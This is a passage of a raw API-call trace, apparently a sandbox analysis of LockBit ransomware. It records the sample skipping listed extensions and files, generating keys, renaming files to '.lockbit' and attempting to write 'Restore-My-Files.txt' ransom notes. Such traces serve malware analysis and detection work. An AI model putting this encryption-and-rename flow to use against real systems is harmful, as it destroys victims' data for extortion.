ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb10, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00256_.WMF", cAlternateFileName="")) returned 1 [0110.089] lstrcmpiW (lpString1=".", lpString2="DD00256_.WMF") returned -1 [0110.089] lstrcmpiW (lpString1="..", lpString2="DD00256_.WMF") returned -1 [0110.089] PathFindExtensionW (pszPath="DD00256_.WMF") returned=".WMF" [0110.089] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.089] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.090] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.090] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00256_.WMF") returned 1 [0110.091] lstrcmpiW (lpString1="ntldr", lpString2="DD00256_.WMF") returned 1 [0110.091] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00256_.WMF") returned 1 [0110.091] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00256_.WMF") returned -1 [0110.091] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00256_.WMF") returned -1 [0110.091] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00256_.WMF") returned 1 [0110.091] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00256_.WMF") returned 1 [0110.091] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.091] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned=".WMF" [0110.091] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.091] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.091] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.092] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.092] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.092] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.092] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.092] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.092] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.092] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.092] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.092] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.092] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.092] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.092] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.092] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.092] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.092] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.092] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.lockbit") returned 72 [0110.092] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0110.093] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.093] malloc (_Size=0x40068) returned 0x1ff1e60 [0110.093] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2832) returned 1 [0110.093] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.094] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0110.094] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.094] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0110.094] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0110.102] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.102] malloc (_Size=0xa6) returned 0x77d800 [0110.102] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0110.102] free (_Block=0x77d800) [0110.102] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.102] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.102] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.102] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe550c00, ftCreationTime.dwHighDateTime=0x1bd4b30, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbe550c00, ftLastWriteTime.dwHighDateTime=0x1bd4b30, nFileSizeHigh=0x0, nFileSizeLow=0x9456, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00261_.WMF", cAlternateFileName="")) returned 1 [0110.102] lstrcmpiW (lpString1=".", lpString2="DD00261_.WMF") returned -1 [0110.102] lstrcmpiW (lpString1="..", lpString2="DD00261_.WMF") returned -1 [0110.102] PathFindExtensionW (pszPath="DD00261_.WMF") returned=".WMF" [0110.102] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.102] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.102] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.103] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.104] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.104] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00261_.WMF") returned 1 [0110.104] lstrcmpiW (lpString1="ntldr", lpString2="DD00261_.WMF") returned 1 [0110.104] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00261_.WMF") returned 1 [0110.104] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00261_.WMF") returned -1 [0110.104] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00261_.WMF") returned -1 [0110.104] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00261_.WMF") returned 1 [0110.104] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00261_.WMF") returned 1 [0110.105] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.105] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned=".WMF" [0110.105] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.105] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.105] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.106] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.106] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.106] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.106] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.106] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.106] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.lockbit") returned 72 [0110.106] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0110.107] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.107] malloc (_Size=0x40068) returned 0x1ff1e60 [0110.107] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=37974) returned 1 [0110.107] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.107] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0110.108] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.108] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0110.108] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.164] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.164] malloc (_Size=0xa6) returned 0x77d800 [0110.164] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0110.166] free (_Block=0x77d800) [0110.166] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.166] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.166] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.167] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8572f00, ftCreationTime.dwHighDateTime=0x1bd4b20, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb8572f00, ftLastWriteTime.dwHighDateTime=0x1bd4b20, nFileSizeHigh=0x0, nFileSizeLow=0x9c5e, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00297_.WMF", cAlternateFileName="")) returned 1 [0110.167] lstrcmpiW (lpString1=".", lpString2="DD00297_.WMF") returned -1 [0110.167] lstrcmpiW (lpString1="..", lpString2="DD00297_.WMF") returned -1 [0110.167] PathFindExtensionW (pszPath="DD00297_.WMF") returned=".WMF" [0110.167] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.167] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.168] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.168] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00297_.WMF") returned 1 [0110.168] lstrcmpiW (lpString1="ntldr", lpString2="DD00297_.WMF") returned 1 [0110.169] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00297_.WMF") returned 1 [0110.169] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00297_.WMF") returned -1 [0110.169] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00297_.WMF") returned -1 [0110.169] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00297_.WMF") returned 1 [0110.169] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00297_.WMF") returned 1 [0110.169] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.169] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned=".WMF" [0110.169] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.169] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.169] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.170] lstrcmpiW 